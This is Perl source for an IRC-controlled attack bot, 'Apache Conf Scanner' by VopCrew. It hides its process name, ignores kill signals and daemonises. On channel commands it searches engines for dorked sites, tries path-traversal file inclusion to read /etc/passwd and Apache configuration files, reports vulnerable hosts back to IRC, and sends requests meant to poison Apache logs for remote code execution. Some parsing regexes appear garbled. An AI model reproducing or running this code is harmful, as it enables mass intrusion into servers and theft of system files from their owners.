#!/usr/bin/perl ####################################### # Apache Conf Scanner v1.0 # # Coded by Vrs-hCk # # d00r[at]telkom[dot]net # # Copyleft © 2009 VopCrew UnderGrounD # ####################################### use HTTP::Request; use LWP::UserAgent; use IO::Socket; use IO::Select; use Socket; my $fakeproc = $ARGV[6]; $ircserver = $ARGV[0] unless $ircserver; my $ircport = $ARGV[1]; my $nickname = $ARGV[2]; my $ident = $ARGV[3]; my $channel = '#'.$ARGV[4]; my $runner = $ARGV[5]; my $fullname = '15(7@2Apache-Conf-Scanner15)'; my $lficmd = '!conf'; my $alicmd = '!logz'; my $status = 0; my $null_byte = "%00"; my $trasversal = "../../../../../../../../../../../../../../../.."; my $lfi_test = "/etc/passwd"; my $lfi_output = "root:(.+):(.+):(.+):(.+):(.+):(.+)"; my $conf_output = "server configuration file"; my @httpd_conf = qw ( /etc/httpd/conf/httpd.conf /usr/local/apache/conf/httpd.conf /usr/local/etc/apache/httpd.conf /usr/local/etc/httpd/httpd.conf /etc/apache/conf/httpd.conf /etc/apache2/conf/httpd.conf /var/www/conf/httpd.conf /usr/local/httpd/conf/httpd.conf ); my $success = "\n [+] Apache Conf Scanner\n [-] Loading Successfully ...\n [-] Process/PID : $fakeproc - $$\n"; my $failed = "\n [?] perl $0 \n\n"; if (@ARGV != 7) { print $failed; exit(); } else { print $success; } $SIG{'INT'} = 'IGNORE'; $SIG{'HUP'} = 'IGNORE'; $SIG{'TERM'} = 'IGNORE'; $SIG{'CHLD'} = 'IGNORE'; $SIG{'PS'} = 'IGNORE'; chdir("/"); $ircserver="$ARGV[0]" if $ARGV[0]; $0 = "$fakeproc"."\0"x16;; my $pid = fork; exit if $pid; die "\n [!] Something Wrong !!!: $!" unless defined($pid); our %irc_servers; our %DCC; my $dcc_sel = new IO::Select->new(); $sel_client = IO::Select->new(); sub sendraw { if ($#_ == '1') { my $socket = $_[0]; print $socket "$_[1]\n"; } else { print $IRC_cur_socket "$_[0]\n"; } } sub connector { my $mynick = $_[0]; my $ircserver_con = $_[1]; my $ircport_con = $_[2]; my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1); if (defined($IRC_socket)) { $IRC_cur_socket = $IRC_socket; $IRC_socket->autoflush(1); $sel_client->add($IRC_socket); $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con"; $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con"; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost; nick("$mynick"); sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname"); sleep 1; } } sub parse { my $servarg = shift; if ($servarg =~ /^PING \:(.*)/) { sendraw("PONG :$1"); } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) { my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5; if ($args =~ /^\001VERSION\001$/) { notice("$pn", "\001VERSION mIRC v6.17 Khaled Mardam-Bey\001"); } if ($args =~ /^(\Q$mynick\E|\!a)\s+(.*)/ ) { my $natrix = $1; my $arg = $2; } } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { if (lc($1) eq lc($mynick)) { $mynick=$4; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; } } elsif ($servarg =~ m/^\:(.+?)\s+433/i) { nick("$mynick|".int rand(999)); } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { $mynick = $2; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; $irc_servers{$IRC_cur_socket}{'nome'} = "$1"; sendraw("MODE $nickname +Bx"); sendraw("JOIN $channel"); sendraw("PRIVMSG $channel :VopCrew UnderGround"); sendraw("PRIVMSG $runner :Hi $runner im here !!!"); } } my $line_temp; while( 1 ) { while (!(keys(%irc_servers))) { connector("$nickname", "$ircserver", "$ircport"); } delete($irc_servers{''}) if (defined($irc_servers{''})); my @ready = $sel_client->can_read(0); next unless(@ready); foreach $fh (@ready) { $IRC_cur_socket = $fh; $mynick = $irc_servers{$IRC_cur_socket}{'nick'}; $nread = sysread($fh, $msg, 4096); if ($nread == 0) { $sel_client->remove($fh); $fh->close; delete($irc_servers{$fh}); } @lines = split (/\n/, $msg); $msg =~ s/\r\n$//; ##################################################################### ############################[ CMD LIST ]############################# ##################################################################### if ($msg=~ /PRIVMSG $channel :!muach/){ sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2Help15) 8,4 $lficmd "); sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2Help15) 8,4 $alicmd "); sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2Help15) 8,4 !eng | !pid | !ver | !about "); } if ($msg=~ /PRIVMSG $channel :!ver/){ sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2Version15)12 Apache Conf Scanner v1.0"); } if ($msg=~ /PRIVMSG $channel :!eng/){ sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2Engine15)12 Google, MSN, AllTheWeb, Altavista, ASK, UOL, GigaBlast, LyCos."); } if ($msg=~ /PRIVMSG $channel :!pid/){ sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2PID15)12 Process/ID : 4 $fakeproc - $$"); } if ($msg=~ /PRIVMSG $channel :!about/){ sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2About15)3 Apache Conf Scanner v1.0"); sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2About15)3 Coded by Vrs-hCk - http://c0li.blogspot.com/"); sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2About15)3 Copyleft © 2009 VopCrew UnderGrounD"); } ##################################################################### ###############################[ LFI ]############################### ##################################################################### ##################################################################### Google Engine if ($msg=~ /PRIVMSG $channel :$lficmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "GooGLe"; my $bugx = $1; my $d0rk = $2; sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2LFI15)(7@2VopCrew15)12 Dork :4 $d0rk"); sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2LFI15)(7@2VopCrew15)12 File :4 $bugx"); sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2LFI15)(7@2VopCrew15)7 Search Engine Loading ..."); &lfiscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### AllTheWeb Engine if ($msg=~ /PRIVMSG $channel :$lficmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "AllTheWeb"; my $bugx = $1; my $d0rk = $2; &lfiscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### MSN Engine if ($msg=~ /PRIVMSG $channel :$lficmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "MsN"; my $bugx = $1; my $d0rk = $2; &lfiscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### Altavista Engine if ($msg=~ /PRIVMSG $channel :$lficmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "ALtaViSTa"; my $bugx = $1; my $d0rk = $2; &lfiscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### ASK Engine if ($msg=~ /PRIVMSG $channel :$lficmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "AsK"; my $bugx = $1; my $d0rk = $2; &lfiscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### UoL Engine if ($msg=~ /PRIVMSG $channel :$lficmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "UoL"; my $bugx = $1; my $d0rk = $2; &lfiscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### GigaBlast Engine if ($msg=~ /PRIVMSG $channel :$lficmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "GiGaBLaST"; my $bugx = $1; my $d0rk = $2; &lfiscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### LyCos Engine if ($msg=~ /PRIVMSG $channel :$lficmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "LyCos"; my $bugx = $1; my $d0rk = $2; &lfiscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### ##################################################################### Apache Log Injection if ($msg=~ /PRIVMSG $channel :$alicmd\s+(.*?)\s+(.+[0-9])/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &injectlog($1,$2,"c0li","c0li.m0de.0n"); } exit; } } for(my $c=0; $c<= $#lines; $c++) { $line = $lines[$c]; $line=$line_temp.$line if ($line_temp); $line_temp=''; $line =~ s/\r$//; unless ($c == $#lines) { parse("$line"); } else { if ($#lines == 0) { parse("$line"); } elsif ($lines[$c] =~ /\r$/) { parse("$line"); } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { parse("$line"); } else { $line_temp = $line; } } } } } ##################################################################### Procedure sub injectlog() { my $host = $_[0]; my $port = $_[1]; my $name = $_[2]; my $c0li = $_[3]; sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2ALI15)12 Injecting7 ".$host.":".$port." 12Apache Access Log ..."); my $php = ""; $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => 80, Proto => "tcp") || die sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2ALI15)4 Cant Connect to7 ".$host.":".$port.""); print $sock "GET /".$c0li." ".$php." HTTP/1.1\r\n"; print $sock "Host: ".$host."\r\n"; print $sock "Connection: close\r\n\r\n"; close($sock); sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2$name15)7 ".$host." 12is Done ..."); sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2$name15)7 ".$host." 12RCE Parameter ->3 $name"); sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2$name15)7 ".$host." 12RCE Identifier ->3 $c0li"); } sub lfiscan() { my $engz = $_[0]; my $bugz = $_[1]; my $dork = $_[2]; my $contatore = 0; if ($engz =~ /GooGLe/) { my @google=&google($dork); push(@total, @google); } if ($engz =~ /AllTheWeb/) { my @alltheweb=&alltheweb($dork); push(@total, @alltheweb); } if ($engz =~ /MsN/) { my @msn=&msn($dork); push(@total, @msn); } if ($engz =~ /ALtaViSTa/) { my @altavista=&altavista($dork); push(@total, @altavista); } if ($engz =~ /AsK/) { my @ask=&ask($dork); push(@total, @ask); } if ($engz =~ /UoL/) { my @uol=&uol($dork); push(@total, @uol); } if ($engz =~ /GiGaBLaST/) { my @gigablast=&gigablast($dork); push(@total, @gigablast); } if ($engz =~ /LyCos/) { my @lycos=&lycos($dork); push(@total, @lycos); } my @clean = &calculate(@total); sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2LFI15)(7@2$engz15)12 Total:4 (".scalar(@total).")12 Clean:4 (".scalar(@clean).")"); if (scalar(@clean) != 0) { sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2LFI15)(7@2$engz15)7 Exploiting4 $dork"); } my $uni=scalar(@clean); foreach my $target (@clean) { $contatore++; if ($contatore==$uni-1){ sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2LFI15)(7@2$engz15)10 Scan Finish for14 $dork"); } my $exploit = "http://".$target.$bugz.$trasversal.$lfi_test.$null_byte; my $response = getcontent($exploit); if ($response =~ /$lfi_output/){ while (($conf = <@httpd_conf>) && ($status != 1)) { my $xpl = "http://".$target.$bugz.$trasversal.$conf.$null_byte; my $re = getcontent($xpl); if ($re =~ /$conf_output/){ $status = 1; my $vuln = "http://".$target."12".$bugz."7".$trasversal.$conf.$null_byte.""; sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2LFI15)(7@2$engz15)15(13@12Vulnerable15)4 ".$vuln." 15(7@3VopCrew15)"); } } } } } sub getcontent() { $url = $_[0]; my $req = HTTP::Request->new(GET => $url); my $ua = LWP::UserAgent->new(); $ua->timeout(5); my $response = $ua->request($req); return $response->content; } sub google(){ my @lst; my $key = $_[0]; for ($b=0;$b<=1000;$b+=100){ my $Go=("http://www.google.com/search?q=".key($key)."&num=100&filter=0&start=".$b); my $Res=query($Go); while ($Res =~ m/\"]*)\//g){ if ($1 !~ /google/){ my $k=$1; my @grep=links($k); push(@lst,@grep); } } } return @lst; } sub alltheweb() { my @lst; my $key = $_[0]; my $i = 0; my $pg = 0; for ( $i = 0 ; $i <= 1000 ; $i += 100 ) { my $all = ("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i); my $Res = query($all); while ( $Res =~ m/http:\/\/(.+?)\<\/span>/g ) { my $k = $1; $k =~ s/ //g; my @grep = links($k); push( @lst, @grep ); } } return @lst; } sub uol() { my @lst; my $key = $_[0]; for ( $b = 1 ; $b <= 1000 ; $b += 10 ) { my $UoL = ("http://mundo.busca.uol.com.br/buscar.html?q=".key($key)."&start=".$i); my $Res = query($UoL); while ( $Res =~ m/\"]*)/g ) { my $k = $1; if ( $k !~ /busca|uol|yahoo/ ) { my $k = $1; my @grep = links($k); push( @lst, @grep ); } } } return @lst; } sub msn() { my @lst; my $key = $_[0]; for ( $b = 1 ; $b <= 1000 ; $b += 10 ) { my $MsN = ("http://search.live.com/results.aspx?q=".key($key)."&first=".$b."&FORM=PERE"); my $Res = query($MsN); while ( $Res =~ m/\"]*)\//g ) { if ( $1 !~ /msn|live/ ) { my $k = $1; my @grep = links($k); push( @lst, @grep ); } } } return @lst; } sub altavista(){ my @lst; my $key = $_[0]; for ($b=1;$b<=1000;$b+=10){ my $AlT=("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b); my $Res=query($AlT); while ($Res=~m/(.+?)\//g){ if ($1 !~ /altavista/){ my $k=$1; $k=~s//g) { if ($1 !~ /lycos/){ my $k = $1; my @grep = links($k); push(@lst, @grep); } } } return @lst; } sub links() { my @l; my $link = $_[0]; my $host = $_[0]; my $hdir = $_[0]; $hdir =~ s/(.*)\/[^\/]*$/\1/; $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; $host .= "/"; $link .= "/"; $hdir .= "/"; $host =~ s/\/\//\//g; $hdir =~ s/\/\//\//g; $link =~ s/\/\//\//g; push( @l, $link, $host, $hdir ); return @l; } sub key() { my $dork = $_[0]; $dork =~ s/ /\+/g; $dork =~ s/:/\%3A/g; $dork =~ s/\//\%2F/g; $dork =~ s/&/\%26/g; $dork =~ s/\"/\%22/g; $dork =~ s/,/\%2C/g; $dork =~ s/\\/\%5C/g; return $dork; } sub query($) { my $url = $_[0]; $url =~ s/http:\/\///; my $host = $url; my $query = $url; my $page = ""; $host =~ s/href=\"?http:\/\///; $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; $query =~ s/$host//; if ( $query eq "" ) { $query = "/"; } eval { my $sock = IO::Socket::INET->new(PeerAddr => "$host", PeerPort => "80", Proto => "tcp") or return; print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; my @r = <$sock>; $page = "@r"; close($sock); }; return $page; } sub calculate { my @calculate = (); my %visti = (); foreach my $element (@_) { $element =~ s/\/+/\//g; next if $visti{$element}++; push @calculate, $element; } return @calculate; } sub nick { return unless $#_ == 0; sendraw("NICK $_[0]"); } sub notice { return unless $#_ == 1; sendraw("NOTICE $_[0] :$_[1]"); }